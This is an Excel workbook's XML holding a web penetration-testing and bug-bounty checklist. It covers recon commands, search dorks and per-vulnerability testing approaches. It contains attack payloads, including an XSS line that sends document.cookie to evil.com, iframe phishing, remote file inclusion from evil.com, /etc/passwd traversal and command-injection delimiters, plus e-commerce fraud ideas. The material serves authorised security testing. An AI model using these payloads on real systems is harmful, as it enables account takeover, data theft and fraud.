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sudoninja\Desktop\checklist\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{605CD371-A8D9-4D08-90BD-E0CA2E3F48B2}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="-120" yWindow="-120" windowWidth="20730" windowHeight="11160" activeTab="5" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
  </bookViews>
  <sheets>
    <sheet name="recon" sheetId="1" r:id="rId1"/>
    <sheet name="web" sheetId="2" r:id="rId2"/>
    <sheet name="OWASP-Testing-Checklist" sheetId="4" r:id="rId3"/>
    <sheet name="Sheet1" sheetId="5" r:id="rId4"/>
    <sheet name="Sheet2" sheetId="6" r:id="rId5"/>
    <sheet name="Sheet3" sheetId="7" r:id="rId6"/>
  </sheets>
  <calcPr calcId="124519"/>
</workbook>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="685" uniqueCount="577">
  <si>
    <t>Recon workflow</t>
  </si>
  <si>
    <t>Horizontal &amp; vertical Correlations</t>
  </si>
  <si>
    <t>https://mxtoolbox.com/asn.aspx</t>
  </si>
  <si>
    <t>https://viewdns.info/reversewhois</t>
  </si>
  <si>
    <t>https://domaineye.com/</t>
  </si>
  <si>
    <t>amass intel -org &lt;company name here&gt;</t>
  </si>
  <si>
    <t>amass intel -asn &lt;ASN Number Here&gt;</t>
  </si>
  <si>
    <t>amass intel -cidr &lt;CIDR Range Here&gt;</t>
  </si>
  <si>
    <t>amass intel -whois -d &lt;Domain Name Here&gt;</t>
  </si>
  <si>
    <t>amass enum -passive -d &lt;Domain Name Here&gt;</t>
  </si>
  <si>
    <t>https://github.com/danielmiessler/SecLists</t>
  </si>
  <si>
    <t>Subdomain bruteforcing - https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66354a056</t>
  </si>
  <si>
    <t>https://github.com/internetwache/CT_subdomains</t>
  </si>
  <si>
    <t>https://crt.sh/?q=%25.facebook.com</t>
  </si>
  <si>
    <t>https://github.com/ghostlulzhacks/CertificateTransparencyLogs</t>
  </si>
  <si>
    <t>gobuster dns -d starbucks.com -w subdomains.txt</t>
  </si>
  <si>
    <t>https://github.com/infosec-au/altdns</t>
  </si>
  <si>
    <t>A small list of these</t>
  </si>
  <si>
    <t>resources can be found below:</t>
  </si>
  <si>
    <t>● Virus Total</t>
  </si>
  <si>
    <t>● Netcraft</t>
  </si>
  <si>
    <t>● DNSdumpster</t>
  </si>
  <si>
    <t>● Threat crowed</t>
  </si>
  <si>
    <t>● Shodan</t>
  </si>
  <si>
    <t>● Cencys</t>
  </si>
  <si>
    <t>● DNSdb</t>
  </si>
  <si>
    <t>● Pastebin</t>
  </si>
  <si>
    <t>knockpy.py &lt;Domain Name Here&gt;</t>
  </si>
  <si>
    <t>https://github.com/blechschmidt/massdns</t>
  </si>
  <si>
    <t>finding aws endpoints, awskeys, urls, upload fields</t>
  </si>
  <si>
    <t>https://github.com/incogbyte/jsearch</t>
  </si>
  <si>
    <t>Google dorks</t>
  </si>
  <si>
    <t>site:&lt;Third Party Vendor&gt; &lt;Company Name&gt;</t>
  </si>
  <si>
    <t>site:pastebin.com “Company Name”</t>
  </si>
  <si>
    <t>site:*.atlassian.net “Company Name”</t>
  </si>
  <si>
    <t>site:bitbucket.org “Company Name”</t>
  </si>
  <si>
    <t>Inurl:gitlab “Company Name”</t>
  </si>
  <si>
    <t>https://pentest-tools.com/information-gathering/google-hacking#</t>
  </si>
  <si>
    <t>Shodan dorks</t>
  </si>
  <si>
    <t>net:&lt;”CIDR,CIDR,CIDR”&gt;</t>
  </si>
  <si>
    <t>org:&lt;”Organization Name”&gt;</t>
  </si>
  <si>
    <t>ssl:&lt;”ORGANIZATION NAME”&gt;</t>
  </si>
  <si>
    <t>Censys - https://censys.io/ipv4</t>
  </si>
  <si>
    <t>waf - https://github.com/EnableSecurity/wafw00f</t>
  </si>
  <si>
    <t>Wafw00f &lt;URL HERE&gt;</t>
  </si>
  <si>
    <t>wafbypass - https://github.com/0xInfection/Awesome-WAF#known-bypasses</t>
  </si>
  <si>
    <t>subdomaintakeover - https://github.com/haccer/subjack</t>
  </si>
  <si>
    <t>https://github.com/EdOverflow/can-i-take-over-xyz</t>
  </si>
  <si>
    <t>github dorks - https://github.com/techgaun/github-dorks/blob/master/github-dorks.txt</t>
  </si>
  <si>
    <t>Aws s3</t>
  </si>
  <si>
    <t>s3bucket dorks - site:.s3.amazonaws.com "Starbucks"</t>
  </si>
  <si>
    <t>https://github.com/ghostlulzhacks/s3brute</t>
  </si>
  <si>
    <t>python amazon-s3-enum.py -w BucketNames.txt -d &lt;Domain Here&gt;</t>
  </si>
  <si>
    <t>Google cloud storage</t>
  </si>
  <si>
    <t>https://github.com/RhinoSecurityLabs/GCPBucketBrute</t>
  </si>
  <si>
    <t>python3 gcpbucketbrute.py -k &lt;Domain Here&gt; -u</t>
  </si>
  <si>
    <t>Digital ocean spaces</t>
  </si>
  <si>
    <t>site:digitaloceanspaces.com &lt;Domain Here&gt;</t>
  </si>
  <si>
    <t>https://github.com/appsecco/spaces-finder</t>
  </si>
  <si>
    <t>Unauthenticated Elasticsearch DB</t>
  </si>
  <si>
    <t>port "9200" elastic [;shodan query]</t>
  </si>
  <si>
    <t>Exposed Docker api</t>
  </si>
  <si>
    <t>product:docker [;shodan query]</t>
  </si>
  <si>
    <t>Kubernetes API</t>
  </si>
  <si>
    <t>unauthenticated REST API on port 10250</t>
  </si>
  <si>
    <t>product:"kubernetes"</t>
  </si>
  <si>
    <t>Gitdumper (.git) - https://github.com/internetwache/GitTools/tree/master/Dumper</t>
  </si>
  <si>
    <t>Subversion (.svn)- https://github.com/anantshri/svn-extractor</t>
  </si>
  <si>
    <t>Exploitation CMS</t>
  </si>
  <si>
    <t>Wordpress - https://github.com/wpscanteam/wpscan</t>
  </si>
  <si>
    <t>Joomla - https://github.com/rezasp/joomscan</t>
  </si>
  <si>
    <t>Drupal - https://github.com/droope/droopescan</t>
  </si>
  <si>
    <t>adobe aem - https://github.com/0ang3el/aem-hacker</t>
  </si>
  <si>
    <t>Magento - https://github.com/steverobbins/magescan</t>
  </si>
  <si>
    <t>URLSCAN</t>
  </si>
  <si>
    <t>https://urlscan.io/</t>
  </si>
  <si>
    <t>https://rapiddns.io</t>
  </si>
  <si>
    <t>https://sitereview.bluecoat.com/#/</t>
  </si>
  <si>
    <t>S.No</t>
  </si>
  <si>
    <t>Vulnerability Name</t>
  </si>
  <si>
    <t>Approach</t>
  </si>
  <si>
    <t>Tool Used</t>
  </si>
  <si>
    <t>Privilege escalation</t>
  </si>
  <si>
    <t>Horizontal (admin-admin &amp; user to user)/Vertical Privilege escalaiton (User-admin)</t>
  </si>
  <si>
    <t>burpsuite</t>
  </si>
  <si>
    <t>Privacy settings bugs</t>
  </si>
  <si>
    <t xml:space="preserve"> Session bugs </t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Open Sans"/>
      </rPr>
      <t>Check if session tokens/access tokens</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Open Sans"/>
      </rPr>
      <t xml:space="preserve"> on
-Expires on logout
-password reset/change
-expires on user removal
-expires on changing roles 
- insufficient session fixation - cookie editor extension used</t>
    </r>
  </si>
  <si>
    <t>Insecure CORS misconfiguration</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">curl command to detect: curl http://site.com -H "Origin:http://evil.com" -I
if it is access-allow-origin:* - not exploitable
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Open Sans"/>
      </rPr>
      <t xml:space="preserve">origin: evil.com
origin: site.evil.com
origin: null
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Open Sans"/>
      </rPr>
      <t>if any site disclosing usernames &amp; password, try cors exploit.</t>
    </r>
  </si>
  <si>
    <t>Corsy/burpsuite</t>
  </si>
  <si>
    <t>CSRF</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
      </rPr>
      <t xml:space="preserve">intercepting the victim request &amp; generating csrf poc &amp; sent to server as a attacker
- CSRF can be get or post based
- try in all state changing requests
use:  jsfiddle.net online tool
check it validates </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
      </rPr>
      <t>orgin/referer</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
      </rPr>
      <t xml:space="preserve"> if not csrf possible
check it is cookie based authentication
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
      </rPr>
      <t>if anticsrf tokens are there,,</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
      </rPr>
      <t xml:space="preserve">
1) remove anticsrf tokens &amp; parameter
2) pass blank paramter
3) add similar length token
4) add another userss valid anti csrf token
5) random token in long length (aaaaaaaaa) 
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
      </rPr>
      <t>if content-type verfication</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
      </rPr>
      <t xml:space="preserve">
1) if no anitcsrf tokens are there
2) try content-type=text/plain
flash csrf
check if any crossdomain policy 
use swf json tool</t>
    </r>
  </si>
  <si>
    <t>jsfiddle.net/burpsuite</t>
  </si>
  <si>
    <t xml:space="preserve">XSS </t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
      </rPr>
      <t>1) inputvalue(try payload like '"batman()&lt;&gt;) reflected without xss protection 
2) xss validator - Intruder
3)</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
      </rPr>
      <t xml:space="preserve"> host header injection through xss</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
      </rPr>
      <t xml:space="preserve">
add referer: batman 
hostheader: bing.com"&gt;script&gt;alert(document.domain)&lt;/script&gt;&lt;"
4) </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
      </rPr>
      <t>URL redirection through xss</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
      </rPr>
      <t xml:space="preserve">
document.location.href="http://evil.com"
5) </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
      </rPr>
      <t>phishing through xss - iframe injection</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
      </rPr>
      <t xml:space="preserve">
&lt;iframe src="http://evil.com" height="100" width="100"&gt;&lt;/iframe&gt;
6) </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
      </rPr>
      <t>Cookie stealing through xss</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
      </rPr>
      <t xml:space="preserve">
document.location.href="http://evil.com/p/?page="+document.cookie
7)</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
      </rPr>
      <t xml:space="preserve">  file upload  through xss</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
      </rPr>
      <t xml:space="preserve">
upload a picturefile, intercept it, change picturename.jpg to xss paylaod using intruder attack
8)</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
      </rPr>
      <t xml:space="preserve">  remote file inclusion (RFI) through xss</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
      </rPr>
      <t xml:space="preserve">
php?=http://brutelogic.com.br/poc.svg - xsspayload
9) </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
      </rPr>
      <t>convert self xss to reflected one</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
      </rPr>
      <t xml:space="preserve">
copy response in a file.html -&gt; it will work
10) </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
      </rPr>
      <t xml:space="preserve">xss through uri parameters </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
      </rPr>
      <t xml:space="preserve">
site.com/about/xss"&gt;&lt;script&gt;</t>
    </r>
  </si>
  <si>
    <t>xss validator/burpsuite</t>
  </si>
  <si>
    <t>Host header injection</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1)  url redirection through host header   (check url having 2xx, 3xx)
real host to bing.com
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Open Sans"/>
      </rPr>
      <t xml:space="preserve">X-forwarded-host: realweb.com
X-forwarded-host: bing.com
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Open Sans"/>
      </rPr>
      <t>2)  webcache poisoning through HHI
injection will be reflected in any buttons of page
3) host header attack on password reset page 
4) xss through HHI</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> URL redirection or open redirect </t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1) </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Open Sans"/>
      </rPr>
      <t>common parameter list:</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Open Sans"/>
      </rPr>
      <t xml:space="preserve"> dest, redirect, uri, path, continue, url, window, to, out, view, dir, show, navigation,
open, u, file, val, validate, domain, callback, return, page, feed, host, port, next, data, reference, site,
html
2) </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Open Sans"/>
      </rPr>
      <t>site.com/bing.com, site.com//bing.com, site.com/payloads</t>
    </r>
  </si>
  <si>
    <t>parameter tampering</t>
  </si>
  <si>
    <t xml:space="preserve"> ecommerce websites</t>
  </si>
  <si>
    <t>HTML injection</t>
  </si>
  <si>
    <t>1) get or post method
2) input value reflecting back 
3) &lt;h1&gt;adam&lt;/h1&gt;
4) url direction via html injection</t>
  </si>
  <si>
    <t>File inclusion</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1) LFI &amp; RFI 
2) </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Open Sans"/>
      </rPr>
      <t>LFI</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Open Sans"/>
      </rPr>
      <t xml:space="preserve">
any.com/index.php?reference=login.php
3) </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Open Sans"/>
      </rPr>
      <t>RFI</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Open Sans"/>
      </rPr>
      <t xml:space="preserve">
any.com/?share=http://evil.com/  
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Open Sans"/>
      </rPr>
      <t xml:space="preserve">common parameter look on </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Open Sans"/>
      </rPr>
      <t xml:space="preserve">
file, document, folder, root, path, pg, style, pdf, template, php_path, doc
dest, redirect, uri, path, continue, url, window, next, data, reference, site, html, val, validate, domain, 
callback, return, page, feed, port, host, to, out, view, dir, show, navigation, open
4)  lfi - /var/www/html/ &amp; /etc/passwd
../../etc/passwd</t>
    </r>
  </si>
  <si>
    <t>lfisuite tool from github</t>
  </si>
  <si>
    <t>Missing spf, dmarc records</t>
  </si>
  <si>
    <t xml:space="preserve">detecting - mxtoolbox.com
</t>
  </si>
  <si>
    <t xml:space="preserve"> anonymousmail.me
 https://emkei.cz/</t>
  </si>
  <si>
    <t xml:space="preserve"> SSRF </t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1) making request from vulnereable application to target website
2) </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Open Sans"/>
      </rPr>
      <t>common paramters to look on</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Open Sans"/>
      </rPr>
      <t xml:space="preserve">
dest, redirect, uri, path, continue, url, window, next, data, reference, site, html, val, validate, domain, callback,
return, page, view, dir, show, file, document, folder, root, path, pg, style, pdf, template, php_path, doc, feed, host,
port, to, out, navigation, open, result.
3) detection using https://www.expressvpn.com/what-is-my-ip &amp; burp collabator also used
4) any.com/index/php?uri=http://external.com
 exploitation of ssrf (read file from server, scan the internal network, ssrf wih rfi)
5) read file from server - file:///identf- intruder on identifier- use lfi payloads
6) scan the internal network - http://localhost:1 (changing the port number topcommonports like 21,22 etc) 
7) ssrf with rfi - exceuting code from the external domain like (use hackoff.html with xss script)</t>
    </r>
  </si>
  <si>
    <t>burpcollabator/https://www.expressvpn.com/what-is-my-ip</t>
  </si>
  <si>
    <t>Critical file found &amp; Source code disclosure</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
      </rPr>
      <t xml:space="preserve">1) using </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
      </rPr>
      <t>https://github.com/danielmiessler/SecLists/tree/master/Discovery/Web-Content</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
      </rPr>
      <t xml:space="preserve"> payloads
2) use dirsearch </t>
    </r>
  </si>
  <si>
    <t>subdomain takeover</t>
  </si>
  <si>
    <t>1) if the website is not used by the target which is laying in any service provider.
signingup on service provider like github, heroku, shopify, zendesk, aws, tumblr etc to takeover domains</t>
  </si>
  <si>
    <t>github.com/nahamsec/HostileSubBruteforcer</t>
  </si>
  <si>
    <t>command injection</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">
1) taking input as a command, reflecting output of that command
2)  </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Open Sans"/>
      </rPr>
      <t>common parameters look on</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Open Sans"/>
      </rPr>
      <t xml:space="preserve">
daemon, host, upload, dir, execute, download, log, ip, cli, cmd, filename, 
3)  how to find cmdi: using delimiter list (like ;^&amp;, &amp;&amp;, |, ||, %0D, %0A, \n, &lt;)
4) how to find - find a input field interacting with os shell
5) try with delimiter &amp; shell commands 
6) ;dir, ;/etc/passwd
7) intercept - use clusterbomb- first parameter for delimeter &amp; 2nd for command payloads</t>
    </r>
  </si>
  <si>
    <t>github.com/commixproject/commix.git</t>
  </si>
  <si>
    <t>fileupload vulnerability</t>
  </si>
  <si>
    <t>1) simple file upload - shell.php - fullcontrol of server - run shellcommands
2) github.com/fuzzdb-projects/fuzzdb/tree/master/attack/file-upload/malicious-images
3) pixel flood attack
4) content type verification 
5) extension verification</t>
  </si>
  <si>
    <t xml:space="preserve"> github.com/almandin/fuxploider</t>
  </si>
  <si>
    <t>XXE Injection</t>
  </si>
  <si>
    <t>1) inputfiled - use xxe payloads in intruder to detect
2) check website is accepting - content-type=text/xml header -&gt; 200ok
3) use online tool called pingb.in - check for external ping
4) for blind xxe - use python -m SimpleHTTPServer 80 
5) SYSTEM "file:///etc/passwd" for local file read
6) SYSTEM "http://systemip/readinganyfile" - blind xxe
7) php:// to get RCE 
8) use Gopher or other URI Handlers to exploit xxe</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">common places to find xxe
1) xml file uplaod (eg:config files)
2) xml input fields
3) xml based apis
4) xml based files (rss, svg)                Tool: </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Open Sans"/>
      </rPr>
      <t>pingb.in/burpsuite</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">account lockout </t>
  </si>
  <si>
    <t>1) preventing from bruteforce attack
2) intercept the login page with usercredentials with burp
3) sent the request to sequencer
4) or sent to intruder - make 1000 times request
5) do credential stuffings
6) the account needs to lock out for 30minutes to 24hrs</t>
  </si>
  <si>
    <t>blind xss</t>
  </si>
  <si>
    <t>1) type of stored xss - attacker input saved in server - saved in database
2) it wont be reflected 
3) look for blind xss in pages like ( contact us, log viewers, feedbackpage, chatapp,
ticket generation app, any app use moderation or updation, saving forms)
4) online tool used - xsshunter.com
5) copy the payload &amp; paste it in input field
6) reflection will be found on xsshunter.com
7) multiple blind xss using intruder</t>
  </si>
  <si>
    <t>burpsuite/Xsshunter.com</t>
  </si>
  <si>
    <t xml:space="preserve"> Buffer overflow - web</t>
  </si>
  <si>
    <t>1) intercept loginpage - pass long string of passwords or any quanitiy of input things
the page will load slow
- types of overflows - buffer, stack, heap, integer, format strin follows
2) dos using buffer overflow - application dos attack</t>
  </si>
  <si>
    <t>CMS vulnerability hunting</t>
  </si>
  <si>
    <t xml:space="preserve">1) wordpress, joomla, drupal, vbulletin, magento                                                2) find vulnerable component in the cms                                                                          3) Search exploit in google </t>
  </si>
  <si>
    <t>wpscan, cmsmap, cmsscan, joomscan, drupwn, vbulletin scanner, mage scanner, owaspVBScan</t>
  </si>
  <si>
    <t xml:space="preserve">IDOR </t>
  </si>
  <si>
    <t>scenario - 1
1) mostly found on user settings or profile management 
2) two accounts required 
3) intercept the request - change emailid of attacker
4) logout
5) try login with victim account - it wont work
scenario - 2 - user moderation
1) find user id 
2) replace attacker id instead of victim id
3) do functionality</t>
  </si>
  <si>
    <t>Burpsuite</t>
  </si>
  <si>
    <t>Long password dos attack</t>
  </si>
  <si>
    <t>1) password - hashing - process - resource consumption by cpu
2) same like buffer overflow - but trying only in password field which doesnt have
password length 
3) try to signup a account 
4) give details intercept the request
5) give password more then the length - forward the request
6) applicatian dos</t>
  </si>
  <si>
    <t>No rate limiting vulnerability - logical flow</t>
  </si>
  <si>
    <t xml:space="preserve">1) capture forgot password page or even any request into burpsuite
2) sent to intruder
3) make 1000 times request
4) it will affect both user &amp; server </t>
  </si>
  <si>
    <t>Password reset poisiong</t>
  </si>
  <si>
    <t>1) forget password page -&gt; intercept in burpsuite
2) host header attack
3) victim will receive emailid from the evilwebsite which mentioned in hostheader</t>
  </si>
  <si>
    <t>Broken Access control (Missing function level access control, IDOR, privilege escalation, authorizationbypass, business logic flaws, forceful browsing, parameter manipulation, path traversal, local file include)</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Open Sans"/>
      </rPr>
      <t>IDOR</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Open Sans"/>
      </rPr>
      <t xml:space="preserve">
Browsing with account 1
https://acme.com/changepw/id?=1234
you can create a 2nd account and you get assinged
https://acme.com/changepw/id?=5678
if you completely logout &amp; loginto account #1 and issue the request 
with the uid from account #2. you may be able to change the 
accounts password. having to find users guids lower the priority
a but, but look for other endpoints that might alow you to search 
for a user's guid                                                                                              </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Open Sans"/>
      </rPr>
      <t xml:space="preserve">Hash based IDOR </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Open Sans"/>
      </rPr>
      <t xml:space="preserve">
- usedid sometime hased with base64                                                                  Local file inclusion, Path Traversal
GET /view?pg= termsandservices
GET /view?pg=../../../../../etc/passwd%00
</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Open Sans"/>
      </rPr>
      <t>Common parameters</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Open Sans"/>
      </rPr>
      <t xml:space="preserve">
id, user, account, number, order, no, doc, key, email,
group, profile, edit
numeric values                                    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Open Sans"/>
      </rPr>
      <t>functions lookon</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Open Sans"/>
      </rPr>
      <t xml:space="preserve">
change email, change password, upgrade/downgrade user role,
create/remove/update/delete context specific app data
shipping, invoices and document viewing</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Open Sans"/>
      </rPr>
      <t xml:space="preserve">Missing function level access control </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Open Sans"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Open Sans"/>
      </rPr>
      <t>forceful browsing</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Open Sans"/>
      </rPr>
      <t xml:space="preserve">
GET /admin/viewTransactions
GET /ADMIN/viewTransactions
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Open Sans"/>
      </rPr>
      <t>static files</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Open Sans"/>
      </rPr>
      <t xml:space="preserve">
GET /patientIMAGES/3216647.jpg
GET /patientDocuments/21714.pdf
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Open Sans"/>
      </rPr>
      <t xml:space="preserve">
Direction function calling
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Open Sans"/>
      </rPr>
      <t xml:space="preserve">POST /admin/viewTransactions.ashx?admin=true&amp;from=08032017&amp;to=08032018
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Open Sans"/>
      </rPr>
      <t xml:space="preserve">
Parameter Manipulation &amp; logic bugs
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Open Sans"/>
      </rPr>
      <t xml:space="preserve">giving negative price 
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Open Sans"/>
      </rPr>
      <t>logic flow - ecommerce</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Open Sans"/>
      </rPr>
      <t xml:space="preserve">
skipping steps on workflows
additem-&gt;checkout-&gt;enter shippinginfo-&gt;payment</t>
    </r>
  </si>
  <si>
    <t>Burpextension used: authmatrix, authz, autorize &amp; autorepeater</t>
  </si>
  <si>
    <t>Account takeover via forget password page</t>
  </si>
  <si>
    <t xml:space="preserve">1) Intercept the forget password page                                                                                                                                        2) add X-Forwarded-Host: bing.com                                                                                                                                          3) forward the request  </t>
  </si>
  <si>
    <t>BurpSuite</t>
  </si>
  <si>
    <t>Broken Access Control</t>
  </si>
  <si>
    <t xml:space="preserve">1)Create an account. 2) Change email id from A to B . 3) Now Generate forget password for email A. 4) Also try same concept on password also.  </t>
  </si>
  <si>
    <t>Rate Limiting bypass</t>
  </si>
  <si>
    <t xml:space="preserve">1) Intercept the forget password page  2) Send to intruder 3) add X-Forwarded-Host: bing.com 4) Target to email 3) forward the request </t>
  </si>
  <si>
    <t>Burp Suite</t>
  </si>
  <si>
    <t xml:space="preserve">Lack of Password confirmation </t>
  </si>
  <si>
    <t xml:space="preserve">Required to delete account, change emailid, </t>
  </si>
  <si>
    <t xml:space="preserve">Ecommerce bugs to test on </t>
  </si>
  <si>
    <t>Order management flaws</t>
  </si>
  <si>
    <t xml:space="preserve">1) Price manipulation during order placement
2) Shipping address manipulation after order placement
3) Absence of mobile verification for cash-on-delivery orders
4) Getting cash back/refunds even when the order is canceled
5) Non-deduction of discounts, even after order cancellation
6) Using automation techniques to perform illegitimate ticket blocking for a certain period of time
7) Client-side validation bypass for maximum seat limit on a single order
8) Bookings/reservations using fake information
9) Usage of burner (disposable) phones for verification
</t>
  </si>
  <si>
    <t>Coupon and reward management flaws</t>
  </si>
  <si>
    <t>1) Coupon redemption, even after order cancellation
2) Bypass of a coupon’s terms and conditions
3) Bypass of a coupon’s validity
4) Use of multiple coupons for the same transaction
